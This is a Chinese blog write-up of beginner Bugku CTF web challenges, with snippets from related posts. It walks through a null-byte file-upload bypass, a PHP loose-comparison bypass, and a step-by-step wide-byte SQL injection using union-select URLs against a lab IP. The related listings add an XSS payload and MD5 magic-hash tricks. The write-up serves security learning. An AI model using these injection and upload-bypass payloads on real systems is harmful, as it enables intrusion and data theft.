bugku web题1~8 write up

最新推荐文章于 2024-02-14 16:17:45 发布
最新推荐文章于 2024-02-14 16:17:45 发布
阅读量342 收藏
点赞数 1
分类专栏: ctf练习 文章标签: web bugku
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/w0ryitang/article/details/80066076
版权
本文是作者初次撰写博客,详细记录了在Bugku平台上的Web安全题目解题过程,涵盖了文件上传漏洞利用、计算器的F12修改元素、GET与POST参数的理解、矛盾问题的科学计数法绕过以及SQL注入的宽字节注入技巧。每个题目都提供了解题思路和关键知识点。
摘要由CSDN通过智能技术生成

第一次写博

web2

打开网页是一个不断加快的动画,没有特别的线索。
右键查看元素,结果flag就在body注释里,如图:

ps:感觉这题收获不大,也许可以理解一下这题的js代码,就当是学js了
p:考察右键查看源码

文件上传测试

测试:需要上传php文件才能得到flag,但是只允许上传图片文件
思路:使用%00截断上传文件
流程:构造文件名为1.php.jpg的文件上传用burp抓包(如图):
如图:
修改文件名:在.php之后加上%00截断,进行url解码还原为空字符,提交得到flag
解码前:这里写图片描述解码后:这里写图片描述
p:文件上传漏洞

计算器

打开网页显示界面如下:
这里写图片描述
尝试输入答案,发现表单输入长度为1
思路:通过元素修改输入框的maxlenth属性,输入计算结果提交,得到flag。(如图)
这里写图片描述
p:利用F12修改元素

web基础$_GET

打开页面得到以下代码:

$what=$_GET['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

简单来说就是通过get传入参数:what=flag
得到flag
p:了解get

web基础$_POST

打开页面得到以下代码:

$what=$_POST['what'];
echo $what;
if($what=='flag')
echo 'flag{****}';

解析:通过get传入参数:what=flag
得到flag(post传参可使用火狐插件hackbar)
p:了解post

矛盾

打开页面得到以下代码:

$num=$_GET['num'];
if(!is_numeric($num))
{
echo $num;
if($num==1)
echo 'flag{**********}';
}
代码解析:
函数:is_numeric()

is_numeric() — 检测变量是否为数字或数字字符串
语法:bool is_numeric ( mixed $var )
如果 var 是数字和数字字符串则返回 TRUE,否则返回 FALSE。

逻辑:

通过get传入参数num,要得到flag,num不能是数字或数字字符串,且num==1
很明显两个条件是矛盾的

思路:

通过科学计数法表示1,因为科学计数法不是纯数字又可以等于一。
php科学计数法格式:系数e+指数
例: 1000==1e+3 1234=1.234e+3 1=1e+0
传入num=1e+0 得到flag
p:科学计数法绕过

web3

打开页面不断出现弹框,禁用弹框后,查看元素。
发现script标签里有这样一行代码:

<!--&#75;&#69;&#89;&#123;&#74;&#50;&#115;&#97;&#52;&#50;&#97;&#104;&#74;&#75;&#45;&#72;&#83;&#49;&#49;&#73;&#73;&#73;&#125;-->

感觉是unicode编码:尝试解码(可用站长工具,网上直接搜就行)
解码得到flag

这里有一个疑问:
&# + 十进制 和 &#x + 十六进制 似乎都是表示unicode编码
额,我是这样理解的,不知道对不对
p:右键产看script,unicode码

sql注入

打开页面如图:
这里写图片描述
要求查询key表,id=1的string字段
测试:单引号 双引号 返回正常,应该进行了转义,查看网页元素发现使用gb2312编码
那就尝试一下宽字节注入:

http://103.238.227.13:10083/?id=1%bf‘–+
http://103.238.227.13:10083/?id=1%bf’ and 1=1–+
http://103.238.227.13:10083/?id=1%bf’ and 1=2–+

不加注释报错,加注释返回正常,存在逻辑判断,存在注入
判断字段数:

http://103.238.227.13:10083?id=1%bf’ order by 2–+

判断回显点:

http://103.238.227.13:10083?id=0%bf’ union select 1,2–+

查数据库:

http://103.238.227.13:10083?id=0%bf’ union select database(),2–+
数据库:sql5

结合题目获取flag:

http://103.238.227.13:10083?id=0%bf’ union select string,2 from sql5.key–+
得到flag

p:宽字节注入

(*有借鉴他人write up)

h0ryit
关注
专栏目录
BugkuCTF(Web) WriteUp
CallMeSa1tyFish的博客
08-06 6133
Web部分 web2 点开以后发现是满屏的滑稽,按照国际惯例,查看源代码发现flag 文件上传测试 用burp抓包修改文件名后缀为.php 计算器 修改最大长度限制 web基础$_GET 目如下 $what=$_GET['what']; echo $what; if($what=='flag') echo 'flag{****}'; 直接输入?what=fla...
bugku web 17~24 write up
h0ryit的博客
05-05 1801
bugku web 17~24 write up flag在index里 打开页面有一个链接,点击链接发现url栏出现file,关键字想到文件包含漏洞。 关于文件包含漏洞的学习可以参考链接:https://zhuanlan.zhihu.com/p/25069779 直接修改file参数:http://120.24.86.145:8005/post/index.php?file=inde...
BUGKU-WEB 矛盾
天泽岁月
02-14 738
BUGKU-WEB 矛盾(弱比较或者弱相等)
bugkuCTF解记录——5、web基础$_POST
weixin_34235457的博客
08-07 1625
$what=$_POST['what']; //post提交数据 echo $what; if($what=='flag') echo 'flag{****}'; 源码如上,我们只需要post提交变量what=flag就欧克,使用插件HackBar提交 $what=$_POST['what']; echo $what; if($what=='flag') echo ...
bugku——矛盾
weixin_40980428的博客
04-07 4702
打开链接后得到一段代码,从这段php代码中能够读出判断获取的是否是数字,然后获取值是否为1,百度了一下php判断字符串以1开头即可判断等值,于是构造num=1,ox表示拼接字符串,即可获取flag...
Bugku writeup(web篇)4【$_GET】
Sn1P3r的博客
09-08 287
【$_GET】 由代码可知,此是通过GET传值获取参数,又因为当what=flag时,输出flag 直接在url后输入?what=flag,即可得到flag
旧版Bugku-Web目下载及write up(相对简单).doc
最新发布
08-24
旧版Bugku-Web目下载及write up(相对简单)
bugku Web write up 一
0verWatch的博客
02-14 2747
web2 view-source:查看源码即可 文件上传测试 上传一个PHP文件发现他要的是图片文件,抓包先改一下content-type为image/jpeg,Go一下发现flag 计算器 F12调出开发者工具,把maxlength改为更长的长度即可 web基础$_GET 完全就是考php基础,直接URL加上index.php?what=flag即可 web基...
bugku Web write up 二
0verWatch的博客
02-20 7307
XSS 先来最简单的弹窗 ?id=&lt;srcipt&gt;altert(/xss/)&lt;/script&gt; 查看源码 发现&lt;&gt;被过滤掉了 这里学到一个技巧,就是用Unicode编码绕过 payload:?id=\u003cimg src=1 onerror=alert(_key_)\u003e 速度要快 这种就是编程 上脚本,注意这是用m...
[Bugku][Web][CTF] 16-29 write up
dadongwudi的博客
12-26 349
web16 备份是个好习惯 /index.php.bak 查看php代码 1.因为md5()函数加密不能处理数组,则key1和key2的返回值为空,即可获得flag http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=4 2.利用==比较漏洞 如果两个字符经MD5加密后的值为 0exxxxx形式,就会被认为是科学计数法,且表示的是0*10的xxxx次方,还是零,都是相等的。 下列的字符串的MD5值都是0e开头的: QNKCDZO 2406
CTF学习(入门):Bugku--web篇--矛盾
m0_45157173的博客
11-15 1530
CTF学习(入门):Bugkuweb篇–矛盾 http://123.206.87.240:8002/get/index1.php 涉及操作:PHP黑魔法、特殊情况下的=号判定 进入目标网站: 解读代码: get一个num, 若num不是数字, 出一次num的值,后若num=1 出flag; 若num为数字则不进行任何操作 所以要输出flag,首先要num不是数字,然后又要num=1 这显然是矛盾的。 单纯使num=1或=a结果如下: 这就只能用num的一个特性: 对1加一个字符,如“1a”、“1-”,
BugKuCTF(CTF-练习平台)——WEB-矛盾
热门推荐
Ifish的博客
02-25 1万+
打开网址 查找is_numeric函数 即num既不能是数字字符,但是要等于1 我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1 因此,构造payload num=1*e*0.1 可以得到flag ...
【转】bugku never give up 详解
qq_41333578的博客
06-18 3786
0x00 前言 此Web 基础,难度中低,需要的基础知识有:HTML、PHP、HTTP 协议。 首先考查发现源码的能力,其次重点考查 PHP 黑魔法的使用,相关链接如下: 目链接:http://123.206.31.85/challenges#never give up 解链接:http://120.24.86.145:8006/test/hello.php 0x01 拦截跳转 点开...
bugku never give up
rommel的博客
08-26 7433
never give up 100 http://120.24.86.145:8006/test/hello.php 作者:御结冰城 进入后我们查看源代码 发现了 于是我们访问view-source:http://120.24.86.145:8006/test/1p.html 发现了一串url编码 解密后得到 window.location.href='htt
Bugku-CTF之never give up
weixin_34262482的博客
04-25 348
Day23 never give up http://123.206.87.240:8006/test/hello.php 本要点:url编码,base64编码,代码审计,php函数 查看源码~ 访问1p.html http://123.206.87.240:8006/test/1p.html 发现时bugku主页 ...
DVWA系列(九)——使用Burpsuite进行File Upload(文件上传)
橘子女侠
05-07 1万+
1. 文件包含(File Upload)漏洞简介 (1)文件上传 File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限; 这里上传的文件可以是木马,病毒,恶意脚本等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问,有问的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理...
github + hexo 博客搭建记录
h0ryit的博客
08-06 490
github + hexo 博客搭建记录 前期准备 下载安装 nodeJS: https://nodejs.org/en/ Git :https://git-scm.com/download/win 配置 git配置 安装好git后,需要配置用户名称和邮件地址 $ git config --global user.name &amp;quot;username&amp;quot; $ git conf...
BugKuCTF WEB 矛盾
无限迭代中......
07-07 618
http://123.206.87.240:8002/get/index1.php 解: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } num既不能是数字字符,但是要等于1 URL http://123.206.87.240:8002/...
BugKu MISC 部分Write_up(三)
fly小灰灰的专栏
11-06 1万+
接上一个博文:BugKu MISC 部分Write_up(二)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值